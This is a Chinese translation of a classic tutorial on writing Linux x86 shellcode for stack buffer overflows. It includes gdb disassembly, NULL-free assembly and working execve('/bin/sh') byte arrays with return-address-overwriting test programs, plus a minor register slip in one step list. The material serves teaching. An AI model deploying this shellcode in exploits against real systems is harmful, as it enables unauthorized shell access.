Shell Code

时间：2008-06-05 来源：零度冰水

现在我们可以修改返回地址即可以改变程序执行的流程, 我们想要执行什么程序呢?
在大多数情况下我们只是希望程序派生出一个shell. 从这个shell中, 可以执行任何我
们所希望的命令. 但是如果我们试图破解的程序里并没有这样的代码可怎么办呢? 我们
怎么样才能将任意指令放到程序的地址空间中去呢? 答案就是把想要执行的代码放到我
们想使其溢出的缓冲区里, 并且覆盖函数的返回地址, 使其指向这个缓冲区. 假定堆栈
的起始地址为0xFF, S代表我们想要执行的代码, 堆栈看起来应该是这样:

内存低     DDDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF     内存高
地址       89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF     地址
           buffer                sfp   ret   a     b     c

<------   [SSSSSSSSSSSSSSSSSSSS][SSSS][0xD8][0x01][0x02][0x03]
           ^                            |
           |____________________________|
堆栈顶部                                                          堆栈底部

    派生出一个shell的C语言代码是这样的:

shellcode.c
-----------------------------------------------------------------------------
#include <stdio.h>

void main() {
   char *name[2];

   name[0] = "/bin/sh";
   name[1] = NULL;
   execve(name[0], name, NULL);
}
------------------------------------------------------------------------------

    为了查明这程序变成汇编后是个什么样子, 我们编译它, 然后祭出调试工具gdb. 记住
在编译的时候要使用-static标志, 否则系统调用execve的真实代码就不会包括在汇编中,
取而代之的是对动态C语言库的一个引用, 真正的代码要到程序加载的时候才会联入.

------------------------------------------------------------------------------
[aleph1]$ gcc -o shellcode -ggdb -static shellcode.c
[aleph1]$ gdb shellcode
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 <main>:       pushl %ebp
0x8000131 <main+1>:     movl   %esp,%ebp
0x8000133 <main+3>:     subl   $0x8,%esp
0x8000136 <main+6>:     movl   $0x80027b8,0xfffffff8(%ebp)
0x800013d <main+13>:    movl   $0x0,0xfffffffc(%ebp)
0x8000144 <main+20>:    pushl $0x0
0x8000146 <main+22>:    leal   0xfffffff8(%ebp),%eax
0x8000149 <main+25>:    pushl %eax
0x800014a <main+26>:    movl   0xfffffff8(%ebp),%eax
0x800014d <main+29>:    pushl %eax
0x800014e <main+30>:    call   0x80002bc <__execve>
0x8000153 <main+35>:    addl   $0xc,%esp
0x8000156 <main+38>:    movl   %ebp,%esp
0x8000158 <main+40>:    popl   %ebp
0x8000159 <main+41>:    ret
End of assembler dump.
(gdb) disassemble __execve
Dump of assembler code for function __execve:
0x80002bc <__execve>:   pushl %ebp
0x80002bd <__execve+1>: movl   %esp,%ebp
0x80002bf <__execve+3>: pushl %ebx
0x80002c0 <__execve+4>: movl   $0xb,%eax
0x80002c5 <__execve+9>: movl   0x8(%ebp),%ebx
0x80002c8 <__execve+12>:        movl   0xc(%ebp),%ecx
0x80002cb <__execve+15>:        movl   0x10(%ebp),%edx
0x80002ce <__execve+18>:        int    $0x80
0x80002d0 <__execve+20>:        movl   %eax,%edx
0x80002d2 <__execve+22>:        testl %edx,%edx
0x80002d4 <__execve+24>:        jnl    0x80002e6 <__execve+42>
0x80002d6 <__execve+26>:        negl   %edx
0x80002d8 <__execve+28>:        pushl %edx
0x80002d9 <__execve+29>:        call   0x8001a34 <__normal_errno_location>
0x80002de <__execve+34>:        popl   %edx
0x80002df <__execve+35>:        movl   %edx,(%eax)
0x80002e1 <__execve+37>:        movl   $0xffffffff,%eax
0x80002e6 <__execve+42>:        popl   %ebx
0x80002e7 <__execve+43>:        movl   %ebp,%esp
0x80002e9 <__execve+45>:        popl   %ebp
0x80002ea <__execve+46>:        ret
0x80002eb <__execve+47>:        nop
End of assembler dump.
------------------------------------------------------------------------------

    下面我们看看这里究竟发生了什么事情. 先从main开始研究:

------------------------------------------------------------------------------
0x8000130 <main>:       pushl %ebp
0x8000131 <main+1>:     movl   %esp,%ebp
0x8000133 <main+3>:     subl   $0x8,%esp

        这是例程的准备工作. 首先保存老的帧指针, 用当前的堆栈指针作为新的帧指针,
        然后为局部变量保留空间. 这里是:

        char *name[2];

        即2个指向字符串的指针. 指针的长度是一个字, 所以这里保留2个字(8个字节)的
        空间.

0x8000136 <main+6>:     movl   $0x80027b8,0xfffffff8(%ebp)

        我们把0x80027b8(字串"/bin/sh"的地址)这个值复制到name[]中的第一个指针, 这
        等价于:

        name[0] = "/bin/sh";

0x800013d <main+13>:    movl   $0x0,0xfffffffc(%ebp)


        我们把值0x0(NULL)复制到name[]中的第二个指针, 这等价于:

        name[1] = NULL;

        对execve()的真正调用从下面开始:

0x8000144 <main+20>:    pushl $0x0

        我们把execve()的参数以从后向前的顺序压入堆栈中, 这里从NULL开始.

0x8000146 <main+22>:    leal   0xfffffff8(%ebp),%eax

        把name[]的地址放到EAX寄存器中.

0x8000149 <main+25>:    pushl %eax

        接着就把name[]的地址压入堆栈中.

0x800014a <main+26>:    movl   0xfffffff8(%ebp),%eax

        把字串"/bin/sh"的地址放到EAX寄存器中

0x800014d <main+29>:    pushl %eax

        接着就把字串"/bin/sh"的地址压入堆栈中

0x800014e <main+30>:    call   0x80002bc <__execve>

        调用库例程execve(). 这个调用指令把IP(指令指针)压入堆栈中.
------------------------------------------------------------------------------

    现在到了execve(). 要注意我们使用的是基于Intel的Linux系统. 系统调用的细节随
操作系统和CPU的不同而不同. 有的把参数压入堆栈中, 有的保存在寄存器里. 有的使用
软中断跳入内核模式, 有的使用远调用(far call). Linux把传给系统调用的参数保存在
寄存器里, 并且使用软中断跳入内核模式.

------------------------------------------------------------------------------
0x80002bc <__execve>:   pushl %ebp
0x80002bd <__execve+1>: movl   %esp,%ebp
0x80002bf <__execve+3>: pushl %ebx

        例程的准备工作.

0x80002c0 <__execve+4>: movl   $0xb,%eax

        把0xb(十进制的11)放入寄存器EAX中(原文误为堆栈). 0xb是系统调用表的索引
        11就是execve.

0x80002c5 <__execve+9>: movl   0x8(%ebp),%ebx

        把"/bin/sh"的地址放到寄存器EBX中.

0x80002c8 <__execve+12>:        movl   0xc(%ebp),%ecx

        把name[]的地址放到寄存器ECX中.

0x80002cb <__execve+15>:        movl   0x10(%ebp),%edx

        把空指针的地址放到寄存器EDX中.

0x80002ce <__execve+18>:        int    $0x80

        进入内核模式.
------------------------------------------------------------------------------


    由此可见调用execve()也没有什么太多的工作要做, 所有要做的事情总结如下:

        a) 把以NULL结尾的字串"/bin/sh"放到内存某处.
        b) 把字串"/bin/sh"的地址放到内存某处, 后面跟一个空的长字(null long word)
.
        c) 把0xb放到寄存器EAX中.
        d) 把字串"/bin/sh"的地址放到寄存器EBX中.
        e) 把字串"/bin/sh"地址的地址放到寄存器ECX中.
        (注: 原文d和e步骤把EBX和ECX弄反了)
        f) 把空长字的地址放到寄存器EDX中.
        g) 执行指令int $0x80.

    但是如果execve()调用由于某种原因失败了怎么办? 程序会继续从堆栈中读取指令,
这时的堆栈中可能含有随机的数据! 程序执行这样的指令十有八九会core dump. 如果execv
e
调用失败我们还是希望程序能够干净地退出. 为此必须在调用execve之后加入一个exit
系统调用. exit系统调用在汇编语言看起来象什么呢?

exit.c
------------------------------------------------------------------------------
#include <stdlib.h>

void main() {
        exit(0);
}
------------------------------------------------------------------------------

------------------------------------------------------------------------------
[aleph1]$ gcc -o exit -static exit.c
[aleph1]$ gdb exit
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) disassemble _exit
Dump of assembler code for function _exit:
0x800034c <_exit>:      pushl %ebp
0x800034d <_exit+1>:    movl   %esp,%ebp
0x800034f <_exit+3>:    pushl %ebx
0x8000350 <_exit+4>:    movl   $0x1,%eax
0x8000355 <_exit+9>:    movl   0x8(%ebp),%ebx
0x8000358 <_exit+12>:   int    $0x80
0x800035a <_exit+14>:   movl   0xfffffffc(%ebp),%ebx
0x800035d <_exit+17>:   movl   %ebp,%esp
0x800035f <_exit+19>:   popl   %ebp
0x8000360 <_exit+20>:   ret
0x8000361 <_exit+21>:   nop
0x8000362 <_exit+22>:   nop
0x8000363 <_exit+23>:   nop
End of assembler dump.
------------------------------------------------------------------------------

    系统调用exit会把0x1放到寄存器EAX中, 在EBX中放置退出码, 并且执行"int 0x80".
就这些了! 大多数应用程序在退出时返回0, 以表示没有错误. 我们在EBX中也放入0. 现
在我们构造shell code的步骤就是这样的了:

        a) 把以NULL结尾的字串"/bin/sh"放到内存某处.
        b) 把字串"/bin/sh"的地址放到内存某处, 后面跟一个空的长字(null long word)
.
        c) 把0xb放到寄存器EAX中.
        d) 把字串"/bin/sh"的地址放到寄存器EBX中.
        e) 把字串"/bin/sh"地址的地址放到寄存器ECX中.
        (注: 原文d和e步骤把EBX和ECX弄反了)
        f) 把空长字的地址放到寄存器EDX中.
        g) 执行指令int $0x80.
        h) 把0x1放到寄存器EAX中.
        i) 把0x0放到寄存器EAX中.
        j) 执行指令int $0x80.

    试着把这些步骤变成汇编语言, 把字串放到代码后面. 别忘了在数组后面放上字串
地址和空字, 我们有如下的代码:

------------------------------------------------------------------------------
        movl   string_addr,string_addr_addr
        movb   $0x0,null_byte_addr
        movl   $0x0,null_addr
        movl   $0xb,%eax
        movl   string_addr,%ebx
        leal   string_addr,%ecx
        leal   null_string,%edx
        int    $0x80
        movl   $0x1, %eax
        movl   $0x0, %ebx
        int    $0x80
        /bin/sh string goes here.
------------------------------------------------------------------------------

    问题是我们不知道在要破解的程序的内存空间中, 上述代码(和其后的字串)会被放到
哪里. 一种解决方法是使用JMP和CALL指令. JMP和CALL指令使用相对IP的寻址方式, 也就
是说我们可以跳到距离当前IP一定间距的某个位置, 而不必知道那个位置在内存中的确切
地址. 如果我们在字串"/bin/sh"之前放一个CALL指令, 并由一个JMP指令转到CALL指令上.
当CALL指令执行的时候, 字串的地址会被作为返回地址压入堆栈之中. 我们所需要的就是
把返回地址放到一个寄存器之中. CALL指令只是调用我们上述的代码就可以了. 假定J代
表JMP指令, C代表CALL指令, s代表字串, 执行过程如下所示:

内存低     DDDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF     内存高
地址       89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF     地址
           buffer                sfp   ret   a     b     c

<------   [JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03]
           ^|^             ^|            |
           |||_____________||____________| (1)
       (2) ||_____________||
             |______________| (3)

堆栈顶部                                                         堆栈底部

    运用上述的修正方法, 并使用相对索引寻址, 我们代码中每条指令的字节数目如下:


------------------------------------------------------------------------------
        jmp    offset-to-call           # 2 bytes
        popl   %esi                     # 1 byte
        movl   %esi,array-offset(%esi) # 3 bytes
        movb   $0x0,nullbyteoffset(%esi)# 4 bytes
        movl   $0x0,null-offset(%esi)   # 7 bytes
        movl   $0xb,%eax                # 5 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   array-offset(%esi),%ecx # 3 bytes
        leal   null-offset(%esi),%edx   # 3 bytes
        int    $0x80                    # 2 bytes
        movl   $0x1, %eax               # 5 bytes
        movl   $0x0, %ebx               # 5 bytes
        int    $0x80                    # 2 bytes
        call   offset-to-popl           # 5 bytes
        /bin/sh string goes here.
------------------------------------------------------------------------------

    通过计算从jmp到call, 从call到popl, 从字串地址到数组, 从字串地址到空长字的
偏量, 我们得到:

------------------------------------------------------------------------------
        jmp    0x26                     # 2 bytes
        popl   %esi                     # 1 byte
        movl   %esi,0x8(%esi)           # 3 bytes
        movb   $0x0,0x7(%esi)           # 4 bytes
        movl   $0x0,0xc(%esi)           # 7 bytes
        movl   $0xb,%eax                # 5 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   0x8(%esi),%ecx           # 3 bytes
        leal   0xc(%esi),%edx           # 3 bytes
        int    $0x80                    # 2 bytes
        movl   $0x1, %eax               # 5 bytes
        movl   $0x0, %ebx               # 5 bytes
        int    $0x80                    # 2 bytes
        call   -0x2b                    # 5 bytes
        .string \"/bin/sh\"             # 8 bytes
------------------------------------------------------------------------------

    这看起来很不错了. 为了确保代码能够正常工作必须编译并执行. 但是还有一个问题.
我们的代码修改了自身, 可是多数操作系统将代码页标记为只读. 为了绕过这个限制我们
必须把要执行的代码放到堆栈或数据段中, 并且把控制转到那里. 为此应该把代码放到数
据段中的全局数组中. 我们首先需要用16进制表示的二进制代码. 先编译, 然后再用gdb
来取得二进制代码.

shellcodeasm.c
------------------------------------------------------------------------------
void main() {
__asm__("
        jmp    0x2a                     # 3 bytes
        popl   %esi                     # 1 byte
        movl   %esi,0x8(%esi)           # 3 bytes
        movb   $0x0,0x7(%esi)           # 4 bytes
        movl   $0x0,0xc(%esi)           # 7 bytes
        movl   $0xb,%eax                # 5 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   0x8(%esi),%ecx           # 3 bytes
        leal   0xc(%esi),%edx           # 3 bytes
        int    $0x80                    # 2 bytes
        movl   $0x1, %eax               # 5 bytes
        movl   $0x0, %ebx               # 5 bytes
        int    $0x80                    # 2 bytes
        call   -0x2f                    # 5 bytes
        .string \"/bin/sh\"             # 8 bytes
");
}
------------------------------------------------------------------------------

------------------------------------------------------------------------------
[aleph1]$ gcc -o shellcodeasm -g -ggdb shellcodeasm.c
[aleph1]$ gdb shellcodeasm
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 <main>:       pushl %ebp
0x8000131 <main+1>:     movl   %esp,%ebp
0x8000133 <main+3>:     jmp    0x800015f <main+47>
0x8000135 <main+5>:     popl   %esi
0x8000136 <main+6>:     movl   %esi,0x8(%esi)
0x8000139 <main+9>:     movb   $0x0,0x7(%esi)
0x800013d <main+13>:    movl   $0x0,0xc(%esi)
0x8000144 <main+20>:    movl   $0xb,%eax
0x8000149 <main+25>:    movl   %esi,%ebx
0x800014b <main+27>:    leal   0x8(%esi),%ecx
0x800014e <main+30>:    leal   0xc(%esi),%edx
0x8000151 <main+33>:    int    $0x80
0x8000153 <main+35>:    movl   $0x1,%eax
0x8000158 <main+40>:    movl   $0x0,%ebx
0x800015d <main+45>:    int    $0x80
0x800015f <main+47>:    call   0x8000135 <main+5>
0x8000164 <main+52>:    das
0x8000165 <main+53>:    boundl 0x6e(%ecx),%ebp
0x8000168 <main+56>:    das
0x8000169 <main+57>:    jae    0x80001d3 <__new_exitfn+55>
0x800016b <main+59>:    addb   %cl,0x55c35dec(%ecx)
End of assembler dump.
(gdb) x/bx main+3
0x8000133 <main+3>:     0xeb
(gdb)
0x8000134 <main+4>:     0x2a
(gdb)
.
.
.
------------------------------------------------------------------------------

testsc.c
------------------------------------------------------------------------------
char shellcode[] =
        "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
        "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
        "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
        "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

void main() {
   int *ret;

   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;

}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o testsc testsc.c
[aleph1]$ ./testsc
$ exit
[aleph1]$
------------------------------------------------------------------------------

    成了! 但是这里还有一个障碍, 在多数情况下, 我们都是试图使一个字符缓冲区溢出.
那么在我们shellcode中的任何NULL字节都会被认为是字符串的结尾, 复制工作就到此为
止了. 对于我们的破解工作来说, 在shellcode里不能有NULL字节. 下面来消除这些字节,
同时把代码精简一点.

           Problem instruction:                 Substitute with:
           --------------------------------------------------------
           movb   $0x0,0x7(%esi)                xorl   %eax,%eax
           molv   $0x0,0xc(%esi)                movb   %eax,0x7(%esi)
                                                movl   %eax,0xc(%esi)
           --------------------------------------------------------
           movl   $0xb,%eax                     movb   $0xb,%al
           --------------------------------------------------------
           movl   $0x1, %eax                    xorl   %ebx,%ebx
           movl   $0x0, %ebx                    movl   %ebx,%eax
                                                inc    %eax
           --------------------------------------------------------

   Our improved code:

shellcodeasm2.c
------------------------------------------------------------------------------
void main() {
__asm__("
        jmp    0x1f                     # 2 bytes
        popl   %esi                     # 1 byte
        movl   %esi,0x8(%esi)           # 3 bytes
        xorl   %eax,%eax                # 2 bytes
        movb   %eax,0x7(%esi)           # 3 bytes
        movl   %eax,0xc(%esi)           # 3 bytes
        movb   $0xb,%al                 # 2 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   0x8(%esi),%ecx           # 3 bytes
        leal   0xc(%esi),%edx           # 3 bytes
        int    $0x80                    # 2 bytes
        xorl   %ebx,%ebx                # 2 bytes
        movl   %ebx,%eax                # 2 bytes
        inc    %eax                     # 1 bytes
        int    $0x80                    # 2 bytes
        call   -0x24                    # 5 bytes
        .string \"/bin/sh\"             # 8 bytes
                                        # 46 bytes total
");
}
------------------------------------------------------------------------------

   And our new test program:

testsc2.c
------------------------------------------------------------------------------
char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

void main() {
   int *ret;

   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;

}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o testsc2 testsc2.c
[aleph1]$ ./testsc2
$ exit
[aleph1]$
------------------------------------------------------------------------------